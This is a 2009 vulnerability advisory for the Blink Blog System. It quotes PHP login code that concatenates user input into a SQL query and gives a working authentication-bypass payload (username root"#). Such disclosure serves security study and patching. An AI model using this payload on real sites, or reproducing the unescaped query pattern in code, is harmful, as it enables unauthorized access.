80 lines
No EOL
1.4 KiB
Text
80 lines
No EOL
1.4 KiB
Text
******** Salvatore "drosophila" Fresta ********
|
|
|
|
[+] Application: Blink Blog System
|
|
[+] Version: Unknown
|
|
[+] Website: http://blogink.sourceforge.net
|
|
|
|
[+] Bugs: [A] Authentication Bypass
|
|
|
|
[+] Exploitation: Remote
|
|
[+] Date: 03 Aug 2009
|
|
|
|
[+] Discovered by: Salvatore Fresta aka drosophila
|
|
[+] Author: Salvatore Fresta aka drosophila
|
|
[+] E-mail: drosophilaxxx [at] gmail.com
|
|
|
|
|
|
***************************************************
|
|
|
|
[+] Menu
|
|
|
|
1) Bugs
|
|
2) Code
|
|
3) Fix
|
|
|
|
|
|
***************************************************
|
|
|
|
[+] Bugs
|
|
|
|
There are many SQL Injection flaws but I post the
|
|
only one that allows a guest to bypass the login.
|
|
|
|
- [A] Authentication Bypass
|
|
|
|
[-] Risk: medium
|
|
[-] Requisites: magic_quotes_gpc = off
|
|
[-] File affected: login.php, db.php
|
|
|
|
This bug allows a guest to bypass the login.
|
|
|
|
login.php:
|
|
|
|
...
|
|
|
|
$username = $_POST["nick"];
|
|
$password = md5($_POST["password"]);
|
|
if ($data = $DB->usercheck($username, $password))
|
|
|
|
...
|
|
|
|
db.php:
|
|
|
|
function usercheck($username, $password)
|
|
{
|
|
$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
|
|
|
|
...
|
|
|
|
|
|
***************************************************
|
|
|
|
[+] Code
|
|
|
|
|
|
- [A] Authentication Bypass
|
|
|
|
username: root"#
|
|
password: foo
|
|
|
|
|
|
***************************************************
|
|
|
|
[+] Fix
|
|
|
|
No fix.
|
|
|
|
|
|
***************************************************
|
|
|
|
# milw0rm.com [2009-08-03] |